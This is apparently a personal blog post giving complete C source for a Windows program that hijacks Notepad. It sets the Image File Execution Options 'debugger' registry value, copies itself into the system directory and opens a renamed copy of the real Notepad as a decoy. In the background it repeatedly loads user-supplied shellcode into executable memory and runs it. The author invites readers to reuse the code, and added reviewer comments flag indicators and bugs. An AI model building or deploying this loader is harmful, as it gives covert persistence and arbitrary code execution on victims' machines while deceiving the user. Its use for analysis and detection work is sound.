It's been a while since I last logged on. Not much good news these days. I abandoned some
classes and wrote a program, and the prototype was finally finished an hour ago. Now I am
enhancing its functionality. The main purpose of this program is to hijack Notepad when the
user tries to open a .txt file with it. This can be done by adding a subkey at a specific
path in the registry.
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\debugger
When the user runs Notepad, Windows checks the registry key shown above and starts the
program named in its `debugger` entry instead. Here is the code:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>
#include<winbase.h>
#include<psapi.h>
#include<Winreg.h>
#include"shellcode.h"
#include<Shlwapi.h>
/* */
/* Global state shared by Install(), CreatePuppet() and SingleInstance().
 * Reviewer note: every fixed string below (file names, registry path, mutex name) is a
 * host-based indicator of this sample and a good hunting/cleanup target. */
int len; // byte count returned by GetSystemDirectory() in Install(); reused by CreatePuppet()
char targetPath[]="\\notepad.exe"; // the real editor, copied aside by Install()
char puppetPath[]="\\notpead.exe"; // copy of the real notepad.exe that CreatePuppet() launches
char newTargetPath[]="\\noetpad.exe"; // where Install() copies this executable; also the IFEO debugger value
// IFEO key for notepad.exe under HKLM (MITRE ATT&CK T1546.012, Image File Execution Options Injection)
char regPath[]="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\\0";
char regSubKey[]="debugger\0"; // REG_SZ value name written by Install()
const char UID[]="M1CR0S0FT\0"; // name of the mutex created by SingleInstance()
HANDLE hMutex; // handle from CreateMutex() in SingleInstance(); kept for the life of the process
char sysdir[MAX_PATH]={0}; // system directory, filled by GetSystemDirectory() in Install()
//create puppet process :notepad.exe to deceive user
void CreatePuppet( char * param);
bool IsReplaced(void);//abandoned function, not called from main()
//install our "debugger" to system (file copies + IFEO registry value)
void Install(void) ;
//make sure only one payload is running (named mutex UID)
void SingleInstance(void);
//copy `payload` (from shellcode.h) into RWX memory and call it
void ExecPayload(void) ;
int main( int argc, char **argv)
{
/* Entry point. Install() runs unconditionally on every launch; the puppet/payload path
 * below runs only when a third argument is present. Presumably argv[1] is the original
 * notepad.exe path supplied by the IFEO launch and argv[2] the document the user opened
 * -- TODO confirm; argv[1] is never read here. */
Install();
if(argc>=2){
// argv[argc] is NULL, so with argc==2 this test is what stops argv[2] from being used
if(argv[2]!=0){
CreatePuppet(argv[2]);
SingleInstance() ;
// never returns: the payload is re-run every 3 s until the process is killed
while(1){
Sleep(3000);
ExecPayload();
}
}
}
}
void CreatePuppet( char * param)
{
/* Launch the saved copy of notepad.exe (puppetPath) with the user's argument so that the
 * hijacked start still looks like a normal Notepad window.
 * `pa` is filled in but never handed to CreateProcess (both attribute arguments are NULL). */
SECURITY_ATTRIBUTES pa;
pa.nLength=sizeof(pa) ;
pa.lpSecurityDescriptor=NULL;
pa.bInheritHandle=TRUE;
PROCESS_INFORMATION pi;
STARTUPINFO si={sizeof(si)};
char systmp[MAX_PATH];
// builds "<system dir>\notpead.exe"; len and sysdir come from GetSystemDirectory() in Install()
memcpy(systmp,sysdir,len);
strcat(systmp,puppetPath);
//printf("debug =%s\n",systmp);
// command line handed to CreateProcess: "<puppet path> <param>"
char *arg=(char*)malloc(strlen(systmp)+strlen(param)+1);
strcpy(arg,systmp);
strcat(arg," ");
strcat(arg,param);
printf("param=%s\n",arg); // echoes the full command line to stdout
BOOL bRet=CreateProcess(
NULL,// lpApplicationName: not given, the executable is taken from the command line
arg,// lpCommandLine
NULL,// lpProcessAttributes: default process security
NULL,// lpThreadAttributes: default security (original comment repeated "process security")
TRUE,// bInheritHandles (original comment said handles are NOT inheritable; TRUE means they are)
NORMAL_PRIORITY_CLASS,// dwCreationFlags (original comment said "new console window"; no such flag is set)
NULL,// inherit this process's environment block
NULL,// inherit this process's current drive and directory
&si,
&pi);
// bRet is not checked; only the process handle is closed, pi.hThread is left open
CloseHandle(pi.hProcess);
}
bool IsReplaced(void)
{
/* Abandoned (see prototype comment; not called from main()). Compares the PE
 * FileHeader.TimeDateStamp of the running image with that of the file at targetPath
 * ("\notepad.exe", i.e. relative to the root of the current drive) and returns true when
 * they match. */
PBYTE p=(PBYTE) GetModuleHandle(NULL);
// follow the byte at DOS-header offset 0x3c (e_lfanew) to the NT headers of our own image
p=(int)p[0x3c]+p;
DWORD selfTimeStamp=((PIMAGE_NT_HEADERS)p)->FileHeader.TimeDateStamp;
//printf("DEBUG time=%08X\n",selfTimeStamp);
/* caution : in 64-bit OS ,32-bit application would open c:\\windows\\sysWOW64\\notepad.exe*/
HANDLE hFile=CreateFile(targetPath,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,0);
if(hFile==INVALID_HANDLE_VALUE){
puts("can not open file \n");
return 0;
}
// map the target read-only and read the same header field from the mapping
HANDLE hMapFile=CreateFileMapping(hFile,NULL,PAGE_READONLY,0,0,0);
if(hMapFile==NULL){
puts("can not map file \n"); // hFile is not closed on this early return
return 0;
}
DWORD offsetHigh;
DWORD offsetLow=GetFileSize(hFile,&offsetHigh); // only the low DWORD is used as the view size
PVOID pDat=(PVOID)MapViewOfFile(hMapFile,FILE_MAP_READ,0,0,offsetLow);
p=(PBYTE) pDat; // pDat is dereferenced below without a NULL check
p=(int)p[0x3c]+p;
DWORD targetTimeStamp=((PIMAGE_NT_HEADERS)p)->FileHeader.TimeDateStamp;
UnmapViewOfFile(pDat);
CloseHandle(hMapFile);
CloseHandle(hFile);
//printf("DEBUG time=%08X\n",targetTimeStamp);
return targetTimeStamp==selfTimeStamp;
}
void Install(void)
{
/* Persistence installer, run on every start (see main()). It needs write access to the
 * system directory and to HKLM -- hence the author's note about privilege below. Effects:
 *  1. copy this executable to "<system dir>\noetpad.exe" if not already present;
 *  2. copy the real "<system dir>\notepad.exe" to "<system dir>\notpead.exe"
 *     (CopyFile with bFailIfExists=TRUE, so only the first time) for CreatePuppet();
 *  3. set HKLM\<regPath>\debugger = "<system dir>\noetpad.exe" so Windows starts this
 *     program whenever notepad.exe is launched (IFEO debugger hijack).
 * Each of 1-3 is an artefact a defender can monitor for or remove. */
len=GetSystemDirectory(sysdir,MAX_PATH);
char systmp[MAX_PATH],systmp1[MAX_PATH];
//priviledge escalation is needed !
//copy our "debugger" to system directory only once
memcpy(systmp,sysdir,len+1);
strcat(systmp,newTargetPath);
// probe for an existing copy; ERROR_FILE_NOT_FOUND is treated as "first run"
HANDLE hFile=CreateFile(systmp,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,0);
if(GetLastError()==ERROR_FILE_NOT_FOUND){
TCHAR selfPath[MAX_PATH] ;
GetModuleFileName(NULL,selfPath,MAX_PATH);
if(CopyFile(selfPath,systmp,FALSE)==0)
printf("copy file failed with Error code=%08X\n",GetLastError());
}else if(GetLastError()==ERROR_SUCCESS)
CloseHandle(hFile) ;
memcpy(systmp,sysdir,len+1);
strcat(systmp,targetPath);
memcpy(systmp1,sysdir,len+1);
strcat(systmp1,puppetPath);
//another copy of notepad.exe , cause every notepad.exe will be redirect to our "debugger"
CopyFile(systmp,systmp1,TRUE);
//create reg key to hijack notepad
HKEY hKey;
// NOTE(review): the Reg* APIs return their status directly; the GetLastError() values
// printed below do not necessarily reflect the registry failure.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,regPath,0,KEY_SET_VALUE,&hKey)!=ERROR_SUCCESS){
printf("open reg key code=%08X\n",GetLastError());
if(RegCreateKey(HKEY_LOCAL_MACHINE,regPath,&hKey)!=ERROR_SUCCESS){
printf(" create reg key code=%08X\n",GetLastError());
exit(0); // no key, no persistence: give up entirely
}
}
memcpy(systmp,sysdir,len+1);
strcat(systmp,newTargetPath);
// the debugger value is the full path of our own copy in the system directory; hKey is never closed
if(RegSetValueEx(hKey,regSubKey,0,REG_SZ,(BYTE*)systmp,strlen(systmp))==ERROR_SUCCESS)
puts("set key success\n");
else
printf("RegSetValue failed with code=%08X\n",GetLastError());
}
void SingleInstance(void)
{
/* Process-wide singleton via a named mutex (UID = "M1CR0S0FT"). If another instance
 * already owns the name, this one exits at once; otherwise the handle stays in hMutex
 * for the life of the process. The fixed mutex name is a usable runtime indicator. */
hMutex=CreateMutex(NULL,TRUE,UID);
if(GetLastError()==ERROR_ALREADY_EXISTS){
CloseHandle(hMutex);
exit(0);
}
}
void ExecPayload(void)
{
/* In-process shellcode loader: allocate an RWX region, copy `payload` (declared in
 * shellcode.h, which is not shown on this page) into it, and call it as a function.
 * Called every 3 s from main(); a fresh region is allocated on every call and never
 * freed. The RWX VirtualAlloc immediately followed by execution is the behaviour that
 * endpoint detection should key on here. */
LPVOID Memory = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, payload, sizeof(payload));
((void(*)())Memory)();
}
I reused some code I wrote before. The variable `payload` is not defined here; you must supply your own
payload to execute. Of course, you can copy any part of my code into your own project. I will be happy if
my code helped you out, though it might look like a joke to you......
Crap! After reading my code more carefully, I found there was no new idea in it at all.
Aye! Ugly code and a limited mind!
Forgive me!